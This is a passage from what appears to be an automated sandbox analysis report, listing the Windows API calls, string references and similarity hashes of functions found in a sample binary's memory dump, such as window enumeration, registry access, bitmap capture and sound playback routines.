CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002425E8
CreateCompatibleDC.GDI32(?), ref: 002425F4
SelectObject.GDI32(00000000,?), ref: 00242601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0024266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002426AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002426D0
SelectObject.GDI32(?,?), ref: 002426D8
DeleteObject.GDI32(?), ref: 002426E1
DeleteDC.GDI32(?), ref: 002426E8
ReleaseDC.USER32(00000000,?), ref: 002426F3

Strings

(, xrefs: 0024268D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 38f2de3f0c0288dd01083b0fc1daa6559fd9267bdc422ff3716df3f81347006e
Instruction ID: a828f2aa0ad375b28ffd7e3f2c16521e694235027ece6e551feec4be409db38b
Opcode Fuzzy Hash: 38f2de3f0c0288dd01083b0fc1daa6559fd9267bdc422ff3716df3f81347006e
Instruction Fuzzy Hash: 1F61E375D10319EFCF04CFA5D884AAEBBB9FF48310F208529E959A7250E770A951CF54

Function 001FDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001FDAA1

Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD659
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD66B
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD67D
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD68F
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6A1
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6B3
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6C5
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6D7
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6E9
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD6FB
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD70D
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD71F
Part of subcall function 001FD63C: _free.LIBCMT ref: 001FD731

_free.LIBCMT ref: 001FDA96

Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0

_free.LIBCMT ref: 001FDAB8
_free.LIBCMT ref: 001FDACD
_free.LIBCMT ref: 001FDAD8
_free.LIBCMT ref: 001FDAFA
_free.LIBCMT ref: 001FDB0D
_free.LIBCMT ref: 001FDB1B
_free.LIBCMT ref: 001FDB26
_free.LIBCMT ref: 001FDB5E
_free.LIBCMT ref: 001FDB65
_free.LIBCMT ref: 001FDB82
_free.LIBCMT ref: 001FDB9A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f4a781962254e8d470a9697cb65eab4ad10483eb9378b98c7c84416d453bf770
Instruction ID: b1e91b62623570889ec77d95fbc474dc61d1d001b9c72205d37877b4f1a35010
Opcode Fuzzy Hash: f4a781962254e8d470a9697cb65eab4ad10483eb9378b98c7c84416d453bf770
Instruction Fuzzy Hash: 4F315A31644A0E9FEB22AE38F845B7A77EAFF21315F114519E648D7191DF71EC408724

Function 0022365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0022369C
_wcslen.LIBCMT ref: 002236A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00223797
GetClassNameW.USER32(?,?,00000400), ref: 0022380C
GetDlgCtrlID.USER32(?), ref: 0022385D
GetWindowRect.USER32(?,?), ref: 00223882
GetParent.USER32(?), ref: 002238A0
ScreenToClient.USER32(00000000), ref: 002238A7
GetClassNameW.USER32(?,?,00000100), ref: 00223921
GetWindowTextW.USER32(?,?,00000400), ref: 0022395D

Strings

%s%u, xrefs: 00223734

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: b70bb6b213dccc891530f6bdfa1df374818cadd4292e07e5104090bb7ee6363d
Instruction ID: 2d810f4436004166c374df78b3d50c551929dec031032f7ac755cc0bb0018aaf
Opcode Fuzzy Hash: b70bb6b213dccc891530f6bdfa1df374818cadd4292e07e5104090bb7ee6363d
Instruction Fuzzy Hash: 6691D071214717BFD708DFA4E884BAAF7A9FF44310F008529F999C6190EB34EA65CB91

Function 00224954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00224994
GetWindowTextW.USER32(?,?,00000400), ref: 002249DA
_wcslen.LIBCMT ref: 002249EB
CharUpperBuffW.USER32(?,00000000), ref: 002249F7
_wcsstr.LIBVCRUNTIME ref: 00224A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00224A64
GetWindowTextW.USER32(?,?,00000400), ref: 00224A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00224AE6
GetClassNameW.USER32(?,?,00000400), ref: 00224B20
GetWindowRect.USER32(?,?), ref: 00224B8B

Strings

ThumbnailClass, xrefs: 00224A6F, 00224AF1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: b756b2712fb0c9a2f23b024fec673140fe70f2b88c021ec6606ffef9991460b7
Instruction ID: e5c220612219a675abaebeb6831b5f7eadfa9180672c6da3e76843851e77030f
Opcode Fuzzy Hash: b756b2712fb0c9a2f23b024fec673140fe70f2b88c021ec6606ffef9991460b7
Instruction Fuzzy Hash: EE911631414316AFDB04EF94E885FAA77E8FF84318F04446AFD859A096EB30ED55CBA1

Function 0024CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0024CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0024CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0024CD48

Part of subcall function 0024CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0024CCAA
Part of subcall function 0024CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0024CCBD
Part of subcall function 0024CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0024CCCF
Part of subcall function 0024CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0024CD05
Part of subcall function 0024CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0024CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0024CCF3

Strings

advapi32.dll, xrefs: 0024CCB8
RegDeleteKeyExW, xrefs: 0024CCC9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 249b6e97da98eca11c7a37cdfe911d677c1df5232597a3a1b9b10db927f4e0bd
Instruction ID: 4c90b3bfb4cd2b4199c68ffe1da0e64d8af3f16428904d66afa32b6d63ff8aae
Opcode Fuzzy Hash: 249b6e97da98eca11c7a37cdfe911d677c1df5232597a3a1b9b10db927f4e0bd
Instruction Fuzzy Hash: BC31AE71912229BFDB248F58DC8CEFFBB7CEF01750F200065A906E2250EA708A45DAA4

Function 00233D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00233D40
_wcslen.LIBCMT ref: 00233D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00233D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00233DBE
RemoveDirectoryW.KERNEL32(?), ref: 00233DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00233E55
CloseHandle.KERNEL32(00000000), ref: 00233E60
CloseHandle.KERNEL32(00000000), ref: 00233E6B

Strings

:, xrefs: 00233D82
\??\%s, xrefs: 00233D5B
\, xrefs: 00233D77

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 8040a79cf0df950f45e349d5503c3f766f95976fe22ea3eabb3458cc88e12f08
Instruction ID: 8e93bbf84c04bcd595fd3e9434dfff0a61f4b61ad48505c18f2c8ab22053a52f
Opcode Fuzzy Hash: 8040a79cf0df950f45e349d5503c3f766f95976fe22ea3eabb3458cc88e12f08
Instruction Fuzzy Hash: 7831A3B591020AABDB21DFA0DC49FEF37BCEF89701F1040A6F509D6050E77097948B24

Function 0022E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0022E6B4

Part of subcall function 001DE551: timeGetTime.WINMM(?,?,0022E6D4), ref: 001DE555

Sleep.KERNEL32(0000000A), ref: 0022E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0022E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0022E727
SetActiveWindow.USER32 ref: 0022E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0022E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0022E773
Sleep.KERNEL32(000000FA), ref: 0022E77E
IsWindow.USER32 ref: 0022E78A
EndDialog.USER32(00000000), ref: 0022E79B

Strings

BUTTON, xrefs: 0022E719

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 37e9ddc1c7df2e605157f756ea9f069f1f532035b07f5dc1d2089959e01037a2
Instruction ID: 20a5b3706b05741a48bd9716f1cbcf77b0827e6e389acb76f765ec828ff2f95c
Opcode Fuzzy Hash: 37e9ddc1c7df2e605157f756ea9f069f1f532035b07f5dc1d2089959e01037a2
Instruction Fuzzy Hash: AB21C6B0214311FFEF005FA0FC8DA357B6DF75534AF210426F506816A2EB75AC249B28

Function 0022E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0022EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0022EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0022EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0022EAA7

Strings

close PlayMe, xrefs: 0022EA6E, 0022EA9B
play PlayMe, xrefs: 0022EAA2
status PlayMe mode, xrefs: 0022EA58
open , xrefs: 0022EA0C
play PlayMe wait, xrefs: 0022EA91
alias PlayMe, xrefs: 0022EA36

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 00073ad8ed8cbc79260954f91119f3151652070858dbbdcbaa4ec0efe6660da3
Instruction ID: 60d9876d8fd9a21164dcd8ee08b602634c8987edabec742203c57f513b06b9fe
Opcode Fuzzy Hash: 00073ad8ed8cbc79260954f91119f3151652070858dbbdcbaa4ec0efe6660da3
Instruction Fuzzy Hash: E3113335A6126979DB20B7A1EC5EEFF6A7CFBE2B00F400429B411A24D1EFB05955C6B0

Function 00225CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00225CE2
GetWindowRect.USER32(00000000,?), ref: 00225CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00225D59
GetDlgItem.USER32(?,00000002), ref: 00225D69
GetWindowRect.USER32(00000000,?), ref: 00225D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00225DCF
GetDlgItem.USER32(?,000003E9), ref: 00225DDD
GetWindowRect.USER32(00000000,?), ref: 00225DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00225E31
GetDlgItem.USER32(?,000003EA), ref: 00225E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00225E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00225E67

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 0b25cf23a8cd589389b4b92be827dde404a3198c7ddaf4916e5dbafe69024923
Instruction ID: 7e0ef2be88861df5869c5899ad75ab9620daf03f57e68948c302e27bcd595d21
Opcode Fuzzy Hash: 0b25cf23a8cd589389b4b92be827dde404a3198c7ddaf4916e5dbafe69024923
Instruction Fuzzy Hash: D7512F71A10715BFDB18CFA8DD89AAEBBB9FB48311F208129F515E6294D7709E10CB50

Function 001D8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 001D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D8BE8,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 001D8FC5

DestroyWindow.USER32(?), ref: 001D8C81
KillTimer.USER32(00000000,?,?,?,?,001D8BBA,00000000,?), ref: 001D8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00216973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 002169A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 002169B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001D8BBA,00000000), ref: 002169D4
DeleteObject.GDI32(00000000), ref: 002169E6

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ee38feb0a86c9af245b9a1fdf463308e77f2d8e57ac9d086f1d3f7109f7c4d82
Instruction ID: bb4f15c17b130a833271c19778355e5b73965d25b1beab216c6a774d92add181
Opcode Fuzzy Hash: ee38feb0a86c9af245b9a1fdf463308e77f2d8e57ac9d086f1d3f7109f7c4d82
Instruction Fuzzy Hash: 6D617B31522702DFDB259F15E94CBA9B7F1FF50316F24451AE0429BAA0CB31A9A0DFA4

Function 001D9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 001D9944: GetWindowLongW.USER32(?,000000EB), ref: 001D9952

GetSysColor.USER32(0000000F), ref: 001D9862

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 98af6c131fd9aadf66a06846a86e604b5ac61701fcd18a3a8d53792ad2dc9ee9
Instruction ID: 7f1cb027f3941a765c679421fef17a1df2b71bea5c5c61cd2eb826c03a69eace
Opcode Fuzzy Hash: 98af6c131fd9aadf66a06846a86e604b5ac61701fcd18a3a8d53792ad2dc9ee9
Instruction Fuzzy Hash: 4C41E631104744AFDF245F38AC88BB93BB6EB56732F244606F9A6872E1D7309C41EB10

Function 002296E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0020F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00229717
LoadStringW.USER32(00000000,?,0020F7F8,00000001), ref: 00229720

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0020F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00229742
LoadStringW.USER32(00000000,?,0020F7F8,00000001), ref: 00229745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00229866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0022984A
^ ERROR, xrefs: 002297FB
Line %d (File "%s"):, xrefs: 0022978F
Line %d:, xrefs: 002297A0
Error: , xrefs: 0022981D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 4f7878508f0ded36aeba9c8d2d18d4ed31ed5ad691e44b6730d0628db510a57d
Instruction ID: 9cf56abd0e03e2f107dbd2d30926c3fba132eb0510bc68dcccb6c5e36109508f
Opcode Fuzzy Hash: 4f7878508f0ded36aeba9c8d2d18d4ed31ed5ad691e44b6730d0628db510a57d
Instruction Fuzzy Hash: D1414172900219BADB14FBE0ED4AEEE7378AF25340F500169F50572092EB35AF58CB61

Function 002206DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002207A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002207BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002207DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00220804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0022082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00220837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0022083C

Strings

\CLSID, xrefs: 00220724
SOFTWARE\Classes\, xrefs: 0022070E
\IPC$, xrefs: 00220784

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 84d54d9c621ab7e3f403a68312a6de3d8b1a98d51a6b75cac661d0cd1c84cc89
Instruction ID: 91f30d0003099c1abe6ed1c3c6b6600e87c64c605ae477b788eb394d17f21b0a
Opcode Fuzzy Hash: 84d54d9c621ab7e3f403a68312a6de3d8b1a98d51a6b75cac661d0cd1c84cc89
Instruction Fuzzy Hash: 4E411676D1022DABDF11EFA4EC85DEEB778FF24354B544129E801A71A1EB309E14CBA0

Function 00243C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00243C5C
CoInitialize.OLE32(00000000), ref: 00243C8A
CoUninitialize.OLE32 ref: 00243C94
_wcslen.LIBCMT ref: 00243D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00243DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00243ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00243F0E
CoGetObject.OLE32(?,00000000,0025FB98,?), ref: 00243F2D
SetErrorMode.KERNEL32(00000000), ref: 00243F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00243FC4
VariantClear.OLEAUT32(?), ref: 00243FD8

Memory Dump Source

